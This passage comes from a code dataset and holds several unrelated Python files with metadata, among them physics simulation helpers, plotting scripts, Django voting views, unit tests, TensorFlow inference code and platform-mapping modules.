\"\"\"Mounts virtual lead to interfaces provided.\n\n :sys: kwant.builder.Builder\n An unfinalized system to mount leads\n :vlead_interface: sequence of kwant.builder.Site\n Interface of lead\n :norb: integer\n Number of orbitals in system hamiltonian.\n \"\"\"\n dim = len(vlead_interface)*norb\n zero_array = np.zeros((dim, dim), dtype=float)\n def selfenergy_func(energy, args=()):\n return zero_array\n\n vlead = kwant.builder.SelfEnergyLead(selfenergy_func, vlead_interface)\n sys.leads.append(vlead)\n\n########### for one configuration\n#di=11\n#def make_system0(width, length):\n# def disk(pos):\n# x,y=pos\n# return width-di= 0)\n if df.count() > 1000:\n permilles = self.df.approxQuantile(\"memory_requested\", [float(i) / 1000 for i in range(0, 1001)], 0.001)\n memory_consumptions = sorted(pd.DataFrame({\"memory_requested\": permilles})[\"memory_requested\"].tolist())\n else:\n memory_consumptions = sorted(df.toPandas()[\"memory_requested\"].tolist())\n\n # If no values are found, we cannot generate a CDF.\n if not memory_consumptions:\n plt.text(0.5, 0.5, 'Not available;\\nTrace does not contain this information.', horizontalalignment='center',\n verticalalignment='center', transform=plt.axes().transAxes, fontsize=16)\n plt.grid(False)\n else:\n ecdf = sm.distributions.ECDF(memory_consumptions)\n\n # Change min to 0 to make it start at 0\n x = np.linspace(min(memory_consumptions), max(memory_consumptions))\n y = ecdf(x)\n plt.step(x, y)\n\n plt.xlabel('Memory (MB)', fontsize=18)\n plt.ylabel('P', fontsize=18)\n\n plt.xlim(0)\n plt.margins(0.05)\n plt.tight_layout()\n\n plt.savefig(os.path.join(self.folder, filename), dpi=200, format='png')\n if show:\n plt.show()\n\n return filename\n","sub_path":"statistic_scripts/task_memory_consumption_cdf.py","file_name":"task_memory_consumption_cdf.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610092202","text":"import driver\n\ndef letter(row, col):\n\tif (row <2) or (row>6):\n\t\treturn 'T'\n\telse:\n\t\tif(col<4)or(col>12):\n\t\t\treturn 'T'\n\t\tif(row == 2) or (row==3):\n\t\t\tif (col>9):\n\t\t\t\treturn 'T'\n\t\tif(row==4) or (row==5):\n\t\t\tif(col>6)and(col<10):\n\t\t\t\treturn 'X'\n\t\t\tif(col>9)and(col<13):\n\t\t\t\treturn 'B'\n\t\tif(row==6):\n\t\t\tif col<7:\n\t\t\t\treturn 'T'\n\t\t\tif(col>6)and(col<13):\n\t\t\t\treturn 'B'\n\t\treturn 'Z'\n\n\n\nif __name__ == '__main__':\n\tdriver.comparePatterns(letter)","sub_path":"patterns/pattern07.py","file_name":"pattern07.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242725746","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\n\nfrom .forms import ContactForm\n\n\ndef about_page(request):\n context ={\n \"title\" : \"About - 013\",\n \"content\" :\"Welcome to the About Page\" \n } \n return render(request,\"home_page.html\", context)\n\n#015\ndef contact_page(request):\n form = ContactForm(request.POST or None)\n \n context ={\n \"title\" : \"Contact\",\n \"content\" :\"Welcome to the Contact Page\", \n \"form\" : form,\n }\n\n if form.is_valid():\n print(f'ecommerce:views::contact_page - form.cleaned_data, {form.cleaned_data}')\n if request.is_ajax():\n return JsonResponse({\"message\": \"Thank You\"})\n \n if form.errors:\n errors = form.errors.as_json()\n if request.is_ajax():\n return HttpResponse(errors, status=400, content_type='application/json')\n return render(request,\"contact/view.html\", context)\n\n\ndef home_page(request):\n #print(request.session['first_name']) # throws error if key does not exist\n # if not request.user.is_authenticated:\n # return login_page(request)\n\n #print(f'ecommerce:views::home_page - request.session.get(\"first_name\", \"unknown\") : {request.session.get(\"first_name\", \"unknown\")}')\n context = {\n \"title\" : \"Hello World - home_page view\",\n \"content\" :\"Content - home_page content\",\n }\n\n if request.user.is_authenticated:\n context[\"premium_content\"] = \"Here is your Premium Content\"\n\n return render(request,\"home_page.html\", context)","sub_path":"src/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"439759148","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.4-x86_64/egg/trachet/ss2.py\n# Compiled at: 2014-07-01 10:29:06\nfrom __future__ import print_function\nimport seqdb, template\n_DB = seqdb.get()\n\ndef get_mnemonic(direction, f):\n \"\"\"\n >>> get_mnemonic('=', 'O')\n ''\n \"\"\"\n global _DB\n key = '%s ESC N %s' % (direction, f)\n if key in _DB:\n mnemonic = _DB[key]\n else:\n mnemonic = ''\n return mnemonic\n\n\ndef format_seq(final, is_input, tracer, controller):\n f = chr(final)\n if is_input:\n direction = '<'\n else:\n direction = '>'\n mnemonic = get_mnemonic(direction, f)\n if mnemonic[0] == '!':\n return eval(mnemonic[1:])\n context = []\n if f:\n context.append(f)\n result = template.getss2() % ((' ').join(context), mnemonic)\n return result\n\n\ndef _test():\n \"\"\"\n >>> _test()\n test\n \n \"\"\"\n global _DB\n _DB = {'> ESC N O': 'test'}\n print(get_mnemonic('>', 'O'))\n print(get_mnemonic('>', 'A'))\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()","sub_path":"pycfiles/trachet-1.0.9-py2.6/ss2.py","file_name":"ss2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"177932480","text":"#使用ddt来进行数据驱动\n#根据用例的数量来自动生成实例方法,批量执行用例\nimport unittest\nfrom libs.ddt import ddt, data\nfrom scripts.handle_excel import HandleExcel\nfrom scripts.handle_config import do_config\nfrom scripts.handle_log import do_log\n\ndo_excel = HandleExcel(do_config.get_config(\"file path\", \"cases_path\"),do_config.get_config(\"file path\", \"sheet_name\"))\ncases = do_excel.get_cases()\n@ddt\nclass Test01(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # wenjian = do_config.get_config(\"file path\", \"log_path\")\n # cls.rizhi = open(wenjian,\"a\",encoding=\"utf8\")\n # cls.rizhi.write(\"\\n{:=^40s}\\n\".format(\"测试用例开始执行\"))\n do_log.info(\"\\n{:=^40s}\".format(\"测试用例开始执行\"))\n\n @classmethod\n def tearDownClass(cls):\n # cls.rizhi.write(\"{:=^40s}\\n\".format(\"测试用例执行结束\"))\n # cls.rizhi.close()\n do_log.info(\"\\n{:=^40s}\".format(\"测试用例开始执行\"))\n\n @data(*cases) #拆包 这里相当于for循环 每拆一次是一个元组会赋值给one_case\n def test_ride(self,one_case):\n actual_results = Jisuan(one_case['l_data'], one_case['r_data']).ride()\n msg = one_case['title']\n expected_results = one_case['expected']\n success_msg = do_config.get_config(\"msg\", \"success_result\")\n fail_msg = do_config.get_config(\"msg\", \"Fail_result\")\n try:\n self.assertEqual(expected_results,actual_results, msg=msg)\n # self.rizhi.write(\"test_ride:{} ,测试结果为 {}\\n\".format(msg,success_msg))\n do_log.info(\"test_ride:{} ,测试结果为 {}\\n\".format(msg, success_msg))\n do_excel.write_result(one_case['case_id']+1,actual_results,success_msg)\n except AssertionError as e:\n # self.rizhi.write(\"test_ride:{} ,测试结果为 {}.具体异常为{}\\n\".format(msg,fail_msg,e))\n do_log.error(\"test_ride:{} ,测试结果为 {}.具体异常为{}\\n\".format(msg,fail_msg,e))\n do_excel.write_result(one_case['case_id'] + 1, actual_results, fail_msg)\n raise e #因为上面捕获了异常,所以这里用raise来返回异常\n\nif __name__ == '__main__':\n unittest.main()\n #执行了多少条用例,用例条数与data装饰器的(位置)参数个数一致\n #ddt和data是黄金搭档,要一起使用才行","sub_path":"cases/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"347972625","text":"import numpy as np\nimport os.path\nimport scipy.misc\nimport shutil\nimport tensorflow as tf\nfrom tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file\nfrom moviepy.editor import VideoFileClip\nimport helper\n\n\nRUN_VIDEO = True\n\ndef pipeline(img):\n img = scipy.misc.imresize(img, image_shape)\n\n img_norm = apply_gaussian(img)\n\n im_softmax = sess.run([tf.nn.softmax(logits)], {keep_prob: 1.0, image_pl: [img_norm]})\n im_softmax = im_softmax[0][:, 1].reshape(image_shape[0], image_shape[1])\n segmentation = (im_softmax > 0.5).reshape(image_shape[0], image_shape[1], 1)\n mask = np.dot(segmentation, np.array([[0, 255, 0, 127]]))\n mask = scipy.misc.toimage(mask, mode=\"RGBA\")\n street_im = scipy.misc.toimage(img)\n street_im.paste(mask, box=None, mask=mask)\n\n return scipy.misc.fromimage(street_im)\n\n# get session and tensors loaded\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('model/bartlebooth-fcn.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./model'))\nprint('model restored')\n\nimage_pl = tf.get_default_graph().get_tensor_by_name(\"image_input:0\")\nlogits = tf.get_default_graph().get_tensor_by_name(\"logits:0\")\nkeep_prob = tf.get_default_graph().get_tensor_by_name(\"keep_prob:0\")\nimage_shape = (160, 576)\n\n# this is single image pipeline\n\nif RUN_VIDEO:\n output = 'windy_road_output.mp4'\n clip = VideoFileClip(\"windy_road.mp4\").subclip(5,7)\n clip = clip.fl_image(pipeline)\n\n # write to file\n clip.write_videofile(output)\nelse:\n pred_img = \"test.png\"\n img = scipy.misc.imresize(scipy.misc.imread(pred_img), image_shape)\n scipy.misc.imsave('prediction.png', pipeline(img))\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"299085568","text":"from django.shortcuts import render\nfrom django.http.request import HttpRequest\nfrom django.http.response import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_POST\n\nfrom ClubVote.service import user_option_service, error_service, question_service, user_service\n\n# Create your views here.\n\n\ndef index(request):\n\n print(request.META)\n\n COMPUTERNAME = request.META.get('COMPUTERNAME', '未知主机名')\n REMOTE_ADDR = user_service.get_user_addr(request)\n\n if not REMOTE_ADDR:\n REMOTE_ADDR = '0.0.0.0'\n if not COMPUTERNAME:\n COMPUTERNAME = '未知主机名'\n\n vote = question_service.get_vote(1, REMOTE_ADDR, COMPUTERNAME)\n return render(request, 'ClubVote/index.html', vote)\n\n@require_POST\n@csrf_exempt\ndef user_choose(request):\n \"\"\"\n 用户选择的接口\n :param request:\n :return:\n \"\"\"\n user_id = request.POST['user_id']\n user_key = request.POST['user_key']\n\n if user_service.check_user_valid(user_id, user_key):\n user_option_service.user_choose(\n request.POST['question_id']\n ,request.POST['option_id']\n ,request.POST['option_index']\n ,request.POST['user_id']\n )\n print('ok at choose')\n return HttpResponse('ok')\n else:\n print('error at choose')\n return HttpResponse('error')\n\ndef response_error(request):\n \"\"\"\n 报告错误信息\n :param request:\n :return:\n \"\"\"\n error_service.error(request.POST['question_id'], request.POST['user_id'])","sub_path":"Vote/ClubVote/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"312363469","text":"import os\nimport glob\nimport pytest\nimport shutil\nimport pele_platform.constants.constants as cs\nimport pele_platform.main as main\nfrom pele_platform.analysis import Analysis, DataHandler, Plotter\n\ntest_path = os.path.join(cs.DIR, \"Examples\")\nsimulation_path = \"../pele_platform/Examples/analysis/data/output\"\ndata = \"data\"\nREPORT_NAME = \"report\"\nTRAJ_NAME = \"trajectory.pdb\"\nANALYSIS_ARGS = os.path.join(test_path, \"analysis/input.yaml\")\nANALYSIS_FLAGS0 = os.path.join(test_path, \"analysis/input_flags0.yaml\")\nANALYSIS_FLAGS = os.path.join(test_path, \"analysis/input_flags.yaml\")\nANALYSIS_XTC_ARGS = os.path.join(test_path, \"analysis/input_xtc.yaml\")\n\n\n@pytest.mark.parametrize((\"x\", \"y\", \"z\"), [(4, 5, 6), (5, 6, None)])\ndef test_plotter(x, y, z):\n \"\"\"\n Checks if the scatter and KDE plots are created correctly.\n Parameters\n ----------\n x : int\n Metric to x\n y :\n Metric to y\n z :\n Metric to z\n Returns\n -------\n Folder with plots.\n \"\"\"\n output_folder = \"tmp/plots\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n data_handler = DataHandler(\n sim_path=simulation_path,\n report_name=REPORT_NAME,\n trajectory_name=TRAJ_NAME,\n be_column=5,\n )\n dataframe = data_handler.get_reports_dataframe()\n plotter = Plotter(dataframe)\n output_scatter = plotter.plot_two_metrics(x, y, z, output_folder=output_folder)\n output_kde = plotter.plot_kde(x, y, output_folder=output_folder, kde_structs=10)\n\n assert os.path.exists(output_scatter)\n assert os.path.exists(output_kde)\n\n\n@pytest.mark.parametrize(\n (\"n_poses\", \"expected_energies\"),\n [\n (0, []),\n (1, [0.879]),\n (4, [0.879, 2.203, 3.563, 6.624]),\n ],\n)\ndef test_top_poses(n_poses, expected_energies):\n \"\"\"\n Checks if data_handler extracts the correct number of top poses and associated metrics.\n Returns\n -------\n Folder with top poses.\n \"\"\"\n output_folder = \"tmp/top_poses\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n analysis = Analysis(\n resname=\"LIG\",\n chain=\"Z\",\n simulation_output=\"../pele_platform/Examples/clustering\",\n skip_initial_structures=False,\n )\n top_poses = analysis.generate_top_poses(output_folder, n_poses)\n top_poses_rounded = [round(pose, 3) for pose in top_poses]\n\n # Check if correct energy values were extracted\n assert len(top_poses) == n_poses\n for energy in expected_energies:\n assert energy in top_poses_rounded\n\n # Check if correct number of files was saved\n results = [\n os.path.basename(file)\n for file in glob.glob(os.path.join(output_folder, \"*pdb\"))\n ]\n assert len(results) == n_poses\n\n\n@pytest.mark.parametrize(\n (\"yaml_file\", \"n_expected_outputs\", \"expected_files\"),\n [\n (\n ANALYSIS_FLAGS0,\n 4,\n [\n \"distance0_Binding_Energy_plot.png\",\n \"currentEnergy_Binding_Energy_distance0_plot.png\",\n \"sasaLig_Binding_Energy_plot.png\",\n \"currentEnergy_Binding_Energy_sasaLig_plot.png\",\n ],\n ),\n (\n ANALYSIS_FLAGS,\n 2,\n [\n \"currentEnergy_Binding_Energy_distance0_plot.png\",\n \"distance0_Binding_Energy_plot.png\",\n ],\n ),\n ],\n)\ndef test_analysis_flags(yaml_file, n_expected_outputs, expected_files):\n \"\"\"\n Runs full simulation with input.yaml with some unusual flags, check the number of created plots and their names to\n ensure correct metrics were take into account.\n Parameters\n ----------\n yaml_file : str\n Path to input.yaml\n n_expected_outputs : int\n Number of expected plots.\n expected_files : List[str]\n List of expected plot names.\n Returns\n -------\n Folder with plots\n \"\"\"\n output_folder = \"../pele_platform/Examples/analysis/data/results/plots/\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n main.run_platform(yaml_file)\n\n for file in expected_files:\n file_path = os.path.join(output_folder, file)\n assert os.path.exists(file_path)\n\n all_files = glob.glob(os.path.join(output_folder, \"*png\"))\n assert len(all_files) == n_expected_outputs\n\n\n@pytest.mark.parametrize((\"yaml_file\", \"expected_poses\", \"expected_clusters\"),\n [(ANALYSIS_ARGS, 1, 0), (ANALYSIS_XTC_ARGS, 3, 2)])\ndef test_analysis_production(yaml_file, expected_poses, expected_clusters):\n \"\"\"\n Runs production analysis from input.yaml, both for PDB and XTC trajectories.\n Parameters\n ----------\n yaml_file : str\n Path to input.yaml\n Returns\n -------\n Parameters object with simulation parameters.\n \"\"\"\n job_params = main.run_platform(yaml_file)\n\n results_folder = os.path.join(job_params.pele_dir, \"results\")\n top_poses = glob.glob(os.path.join(results_folder, \"top_poses/*pdb\"))\n clusters = glob.glob(os.path.join(results_folder, \"clusters/*pdb\"))\n\n assert len(top_poses) == expected_poses\n assert len(clusters) == expected_clusters\n\n # Clean up\n shutil.rmtree(results_folder)\n\n\n@pytest.mark.parametrize(\n (\"method\", \"bandwidth\", \"n_clusters\"),\n [\n (\"hdbscan\", 5, 0), # only gets orphan clusters [-1]\n (\"meanshift\", 100, 1),\n (\"meanshift\", 30, 3),\n (\"gaussianmixture\", 1, 2),\n ],\n)\ndef test_clustering_methods(method, bandwidth, n_clusters):\n \"\"\"\n Checks if built-in clustering methods are producing expected number of clusters.\n\n Parameters\n ----------\n method : str\n Built-in clustering method, e.g. \"dbscan\".\n bandwidth : float\n Bandwidth for meanshift (or epsilon for DBSCAN).\n n_clusters : int\n Number of clusters for the Gaussian mixture model.\n\n Returns\n -------\n Folder with clusters, plots and report.\n \"\"\"\n working_folder = \"clustering_method\"\n results = os.path.join(working_folder, \"*pdb\")\n\n if os.path.exists(working_folder):\n shutil.rmtree(working_folder)\n\n analysis = Analysis(\n resname=\"LIG\", chain=\"Z\",\n simulation_output=\"../pele_platform/Examples/clustering\",\n skip_initial_structures=False)\n analysis.generate_clusters(working_folder, method,\n bandwidth=bandwidth,\n analysis_nclust=n_clusters)\n assert len(glob.glob(results)) == n_clusters\n\n\ndef test_analysis_api():\n \"\"\"\n Runs full analysis workflow (with GMM clustering).\n Returns\n -------\n Returns a directory with top_poses, clusters and plots.\n \"\"\"\n working_folder = \"full_analysis\"\n output = \"../pele_platform/Examples/clustering\"\n n_clusts = 3\n\n analysis = Analysis(resname=\"LIG\", chain=\"Z\",\n simulation_output=output,\n skip_initial_structures=False)\n analysis.generate(working_folder, \"gaussianmixture\",\n analysis_nclust=n_clusts)\n\n # Check if reports exist\n assert os.path.exists(os.path.join(working_folder, \"data.csv\"))\n assert os.path.exists(os.path.join(working_folder, \"summary.pdf\"))\n\n # Check plots\n plots = glob.glob(os.path.join(working_folder, \"plots\", \"*png\"))\n assert len(plots) == 2\n\n # Check top poses\n top_poses = glob.glob(os.path.join(working_folder, \"top_poses\", \"*pdb\"))\n assert len(top_poses) == 7\n\n # Check clusters\n clusters = glob.glob(os.path.join(working_folder, \"clusters\", \"*pdb\"))\n assert len(clusters) == n_clusts\n\n # Check if data.csv exists and is not empty\n data_csv = os.path.join(working_folder, \"data.csv\")\n assert os.path.exists(data_csv)\n\n with open(data_csv, \"r\") as file:\n lines = file.readlines()\n assert len(lines) == 8\n assert lines[0] == \"Step,numberOfAcceptedPeleSteps,currentEnergy,Binding Energy,sasaLig,epoch,trajectory,Cluster\\n\"\n","sub_path":"tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"287197171","text":"class NumberUtil(object):\n @staticmethod\n def truncate_digits(in_number: float, max_digits: int) -> float:\n \"\"\"Restrict maximum decimal digits by removing them\"\"\"\n working_num = int(in_number * (10 ** max_digits))\n return working_num / (10 ** max_digits)\n\n @staticmethod\n def format_float(in_number: float) -> str:\n \"\"\"Format a float with un-necessary chars removed. E.g: 1.0000 == 1\"\"\"\n as_str = f\"{in_number:.6f}\".rstrip('0')\n if as_str[len(as_str) - 1] == '.':\n as_str = as_str.replace('.', '')\n return as_str\n","sub_path":"util/number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"456792832","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nfrom PIL import Image\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport heatmap\nfrom heatmap import colorschemes\n\n\nclass TestHeatmap(unittest.TestCase):\n \"\"\"unittests for TestHeatmap\"\"\"\n\n def setUp(self):\n self.heatmap = heatmap.Heatmap()\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_random_defaults(self):\n pts = [(random.random(), random.random()) for x in range(400)]\n img = self.heatmap.heatmap(pts)\n img.save(\"01-400-random.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_vert_line(self):\n pts = [(50, x) for x in range(100)]\n img = self.heatmap.heatmap(pts, area=((0, 0), (200, 200)))\n img.save(\"02-vert-line.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_horz_line(self):\n pts = [(x, 300) for x in range(600, 700)]\n img = self.heatmap.heatmap(\n pts, size=(800, 400), area=((0, 0), (800, 400)))\n img.save(\"03-horz-line.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_random(self):\n pts = [(random.random(), random.random()) for x in range(40000)]\n\n # This should also generate a warning on stderr of overly dense.\n img = self.heatmap.heatmap(pts, dotsize=25, opacity=128)\n img.save(\"04-40k-random.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_square(self):\n pts = [(x*100, 50) for x in range(2, 50)]\n pts.extend([(4850, x*100) for x in range(2, 50)])\n pts.extend([(x*100, 4850) for x in range(2, 50)])\n pts.extend([(50, x*100) for x in range(2, 50)])\n\n img = self.heatmap.heatmap(\n pts, dotsize=100, area=((0, 0), (5000, 5000)))\n img.save(\"05-square.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_single_point(self):\n pts = [(random.uniform(-77.012, -77.050),\n random.uniform(38.888, 38.910)) for x in range(100)]\n img = self.heatmap.heatmap(pts)\n self.heatmap.save_kml(\"06-wash-dc.kml\")\n\n self.assertIsInstance(img, Image.Image)\n\n def test_invalid_heatmap(self):\n self.assertRaises(Exception, self.heatmap.heatmap, ([],))\n\n\nclass TestColorScheme(unittest.TestCase):\n\n def test_schemes(self):\n self.assertSetEqual(set(colorschemes.valid_schemes()),\n {'fire', 'pgaitch', 'pbj', 'omg', 'classic'})\n\n def test_values(self):\n rgb_colors = range(256)\n\n for scheme, colors in colorschemes.SCHEMES.iteritems():\n self.assertIsInstance(colors, list)\n self.assertEqual(len(colors), 256)\n\n for color in colors:\n self.assertIsInstance(color, tuple)\n self.assertEqual(len(color), 3)\n\n red, green, blue = color\n\n self.assertIsInstance(red, int)\n self.assertIn(red, rgb_colors)\n\n self.assertIsInstance(green, int)\n self.assertIn(green, rgb_colors)\n\n self.assertIsInstance(blue, int)\n self.assertIn(blue, rgb_colors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"387810165","text":"# October 2013, Glenn F. Matthews\n# Copyright (c) 2013-2017 the COT project developers.\n# See the COPYRIGHT.txt file at the top-level directory of this distribution\n# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.\n#\n# This file is part of the Common OVF Tool (COT) project.\n# It is subject to the license terms in the LICENSE.txt file found in the\n# top-level directory of this distribution and at\n# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part\n# of COT, including this file, may be copied, modified, propagated, or\n# distributed except according to the terms contained in the LICENSE.txt file.\n\n\"\"\"Package for identifying guest platforms and handling platform differences.\n\nThe :class:`~COT.platforms.generic.GenericPlatform` class describes the API\nand provides a generic implementation that can be overridden by subclasses\nto provide platform-specific logic.\n\nIn general, other modules should not instantiate subclasses directly but should\ninstead use the :func:`~COT.platforms.platform_from_product_class` API to\nderive the appropriate subclass instance.\n\nAPI\n---\n\n.. autosummary::\n :nosignatures:\n\n is_known_product_class\n platform_from_product_class\n\nPlatform modules\n----------------\n\n.. autosummary::\n :toctree:\n\n COT.platforms.generic\n COT.platforms.cisco_csr1000v\n COT.platforms.cisco_iosv\n COT.platforms.cisco_iosxrv\n COT.platforms.cisco_iosxrv_9000\n COT.platforms.cisco_nexus_9000v\n COT.platforms.cisco_nxosv\n\"\"\"\n\nimport logging\n\nfrom .generic import GenericPlatform\nfrom .cisco_csr1000v import CSR1000V\nfrom .cisco_iosv import IOSv\nfrom .cisco_iosxrv import IOSXRv, IOSXRvRP, IOSXRvLC\nfrom .cisco_iosxrv_9000 import IOSXRv9000\nfrom .cisco_nexus_9000v import Nexus9000v\nfrom .cisco_nxosv import NXOSv\n\nlogger = logging.getLogger(__name__)\n\n\nPRODUCT_PLATFORM_MAP = {\n 'com.cisco.csr1000v': CSR1000V,\n 'com.cisco.iosv': IOSv,\n 'com.cisco.n9k': Nexus9000v,\n 'com.cisco.nx-osv': NXOSv,\n 'com.cisco.ios-xrv': IOSXRv,\n 'com.cisco.ios-xrv.rp': IOSXRvRP,\n 'com.cisco.ios-xrv.lc': IOSXRvLC,\n 'com.cisco.ios-xrv9000': IOSXRv9000,\n # Some early releases of IOS XRv 9000 used the\n # incorrect string 'com.cisco.ios-xrv64'.\n 'com.cisco.ios-xrv64': IOSXRv9000,\n}\n\"\"\"Mapping of known product class strings to Platform classes.\"\"\"\n\n\ndef is_known_product_class(product_class):\n \"\"\"Determine if the given product class string is a known one.\n\n Args:\n product_class (str): String such as 'com.cisco.iosv'\n\n Returns:\n bool: Whether product_class is known.\n\n Examples:\n ::\n\n >>> is_known_product_class(\"com.cisco.n9k\")\n True\n >>> is_known_product_class(\"foobar\")\n False\n \"\"\"\n return product_class in PRODUCT_PLATFORM_MAP\n\n\ndef platform_from_product_class(product_class):\n \"\"\"Get the class of Platform corresponding to a product class string.\n\n Args:\n product_class (str): String such as 'com.cisco.iosv'\n\n Returns:\n class: GenericPlatform or a subclass of it\n\n Examples:\n ::\n\n >>> platform_from_product_class(\"com.cisco.n9k\")\n \n >>> platform_from_product_class(None)\n \n >>> platform_from_product_class(\"frobozz\")\n \n \"\"\"\n if product_class is None:\n return GenericPlatform\n if is_known_product_class(product_class):\n return PRODUCT_PLATFORM_MAP[product_class]\n logger.warning(\"Unrecognized product class '%s' - known classes \"\n \"are %s. Treating as a generic platform\",\n product_class, PRODUCT_PLATFORM_MAP.keys())\n return GenericPlatform\n\n\n__all__ = (\n 'is_known_product_class',\n 'platform_from_product_class',\n)\n","sub_path":"COT/platforms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"582851133","text":"#!/usr/bin/env python\n\nimport logging\n\nfrom xmlrpclib import ServerProxy\n\nfrom wrangler.config import config_base\n\nlog = logging.getLogger('wrangler.client')\n\nclass WranglerClient(object):\n def __init__(self, hostname=None, port=None):\n self.config = config_base()\n if not hostname:\n hostname = self.config.get('lasso', 'hostname')\n if not port:\n port = self.config.getint('lasso', 'port')\n log.debug('Starting client to %s:%d' % (hostname, port))\n self.client = ServerProxy('http://%s:%s' % (hostname, port), allow_none=True)\n \n\n def __getattr__(self, attr):\n func = getattr(self.client, attr)\n return func","sub_path":"src/wrangler/network/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"144401603","text":"############## CLASSES CODES #################\n\nclass Alarm:\n\n def __init__(self, state: bool) -> None:\n self.__state = state # private atribute\n\n def get_state(self) -> bool:\n return self.__state\n\n def set_state(self, value: bool) -> None:\n if isinstance(value, bool):\n self.__state = value\n else:\n print(\"Incorrect value! '{}' isn't boolean value.\" .format(value))\n\n\n################# TESTS ####################\n\nprint(\"\\n############## GETTER AND SETTERS TEST ################\\n\")\n\nal = Alarm(False)\n\nprint(al.get_state())\nal.set_state(True)\nprint(al.get_state())\nal.set_state(1)\nprint(al.get_state())","sub_path":"files/04_getters_setters_states.py","file_name":"04_getters_setters_states.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"138197208","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\n\ndef import_csv():\n # import, set header names and change columns depending on content\n data = pd.read_csv('CD.txt',sep=',',names=['Date','Open','High','Low','Close','Volume'])\n\n # redefine data as being 0/1. 1 when close > open and 0 in all other cases\n data_np = data.values\n new_array = []\n\n for i in range(0,len(data_np)):\n if data_np[i][4] > data_np[i][1]:\n new_array.append(1)\n else:\n new_array.append(-1)\n\n for i in range(1, len(new_array)):\n new_array[i] = new_array[i] + new_array[i - 1]\n\n scaler = MinMaxScaler(feature_range=(-1,1))\n\n array = scaler.fit_transform(np.reshape(np.array(new_array),newshape=(len(new_array),1)))\n\n return array, scaler\n\ndef sample_Z(m, n):\n return np.random.uniform(-1., 1., size=[m, n])\n\ndef generator(Z,hsize=[16, 16],reuse=False):\n with tf.variable_scope(\"GAN/Generator\",reuse=reuse):\n h1 = tf.layers.dense(Z,hsize[0],activation=tf.nn.leaky_relu)\n h2 = tf.layers.dense(h1,hsize[1],activation=tf.nn.leaky_relu)\n out = tf.layers.dense(h2,2)\n\n return out\n\ndef discriminator(X,hsize=[16, 16],reuse=False):\n with tf.variable_scope(\"GAN/Discriminator\",reuse=reuse):\n h1 = tf.layers.dense(X,hsize[0],activation=tf.nn.leaky_relu)\n h2 = tf.layers.dense(h1,hsize[1],activation=tf.nn.leaky_relu)\n h3 = tf.layers.dense(h2,2)\n out = tf.layers.dense(h3,1)\n\n return out, h3\n\ndef get_next(all_data,start_num,batch_size):\n return all_data[start_num:(start_num+batch_size)]\n\ndef main():\n 